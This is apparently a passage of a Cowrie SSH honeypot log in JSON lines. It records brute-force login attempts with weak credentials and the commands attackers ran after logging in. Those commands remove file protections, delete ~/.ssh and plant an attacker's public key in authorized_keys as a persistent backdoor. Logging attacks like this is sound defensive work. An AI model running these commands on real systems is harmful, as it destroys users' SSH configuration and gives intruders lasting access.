{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:56.967294Z","src_ip":"46.101.8.63","session":"a6bdeb27e918"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:42:57.102405Z","src_ip":"46.101.8.63","session":"a6bdeb27e918"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:58.128173Z","src_ip":"46.101.8.63","session":"a6bdeb27e918"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":47092,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ab9c3a1ff9a","protocol":"ssh","message":"New connection: 46.101.8.63:47092 (1.2.3.4:22) [session: 6ab9c3a1ff9a]","sensor":"my-vps","timestamp":"2025-09-08T23:42:58.147635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:42:58.148529Z","src_ip":"46.101.8.63","session":"6ab9c3a1ff9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:42:58.168856Z","src_ip":"46.101.8.63","session":"6ab9c3a1ff9a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:42:58.292430Z","src_ip":"46.101.8.63","session":"6ab9c3a1ff9a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:58.314574Z","src_ip":"46.101.8.63","session":"9ca22bc6496c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:42:58.315542Z","src_ip":"46.101.8.63","session":"6ab9c3a1ff9a"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":45212,"dst_ip":"1.2.3.4","dst_port":22,"session":"e421ccbc2968","protocol":"ssh","message":"New connection: 45.150.34.92:45212 (1.2.3.4:22) [session: e421ccbc2968]","sensor":"my-vps","timestamp":"2025-09-08T23:43:16.819153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:16.819976Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:16.837638Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.login.success","username":"root","password":"RootPass","message":"login attempt [root/RootPass] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:43:16.949174Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:43:17.012381Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.013253Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.014381Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.032838Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:43:17.173740Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.174485Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.193762Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.194696Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":45218,"dst_ip":"1.2.3.4","dst_port":22,"session":"175c068b08ab","protocol":"ssh","message":"New connection: 45.150.34.92:45218 (1.2.3.4:22) [session: 175c068b08ab]","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.210513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.211448Z","src_ip":"45.150.34.92","session":"175c068b08ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.228886Z","src_ip":"45.150.34.92","session":"175c068b08ab"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:43:17.340511Z","src_ip":"45.150.34.92","session":"175c068b08ab"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:18.360703Z","src_ip":"45.150.34.92","session":"175c068b08ab"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":45234,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ffb0bde24ac","protocol":"ssh","message":"New connection: 45.150.34.92:45234 (1.2.3.4:22) [session: 4ffb0bde24ac]","sensor":"my-vps","timestamp":"2025-09-08T23:43:18.377318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:18.377975Z","src_ip":"45.150.34.92","session":"4ffb0bde24ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:18.395589Z","src_ip":"45.150.34.92","session":"4ffb0bde24ac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:43:18.508116Z","src_ip":"45.150.34.92","session":"4ffb0bde24ac"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:18.527664Z","src_ip":"45.150.34.92","session":"e421ccbc2968"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:18.528944Z","src_ip":"45.150.34.92","session":"4ffb0bde24ac"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":35928,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ac4cda5a4a5","protocol":"ssh","message":"New connection: 182.18.161.165:35928 (1.2.3.4:22) [session: 4ac4cda5a4a5]","sensor":"my-vps","timestamp":"2025-09-08T23:43:38.652756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:38.653421Z","src_ip":"182.18.161.165","session":"4ac4cda5a4a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:38.916966Z","src_ip":"182.18.161.165","session":"4ac4cda5a4a5"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"1234567","message":"login attempt [esuser/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T23:43:40.011648Z","src_ip":"182.18.161.165","session":"4ac4cda5a4a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36632,"dst_ip":"1.2.3.4","dst_port":22,"session":"07364c39cb3c","protocol":"ssh","message":"New connection: 212.227.235.229:36632 (1.2.3.4:22) [session: 07364c39cb3c]","sensor":"my-vps","timestamp":"2025-09-08T23:43:41.079659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:41.081086Z","src_ip":"212.227.235.229","session":"07364c39cb3c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:41.278096Z","src_ip":"182.18.161.165","session":"4ac4cda5a4a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:41.572624Z","src_ip":"212.227.235.229","session":"07364c39cb3c"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"1234567890","message":"login attempt [elasticsearch/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T23:43:42.929839Z","src_ip":"212.227.235.229","session":"07364c39cb3c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:44.248597Z","src_ip":"212.227.235.229","session":"07364c39cb3c"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":41062,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c7b0f1ef8fd","protocol":"ssh","message":"New connection: 93.113.63.124:41062 (1.2.3.4:22) [session: 8c7b0f1ef8fd]","sensor":"my-vps","timestamp":"2025-09-08T23:43:47.384415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:43:47.385517Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:43:47.455379Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.login.success","username":"root","password":"alexander123","message":"login attempt [root/alexander123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:43:47.963534Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:43:48.233629Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.234393Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.235732Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:43:48.355199Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:43:48.512906Z","src_ip":"93.113.63.124","session":"8c7b0f1ef8fd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 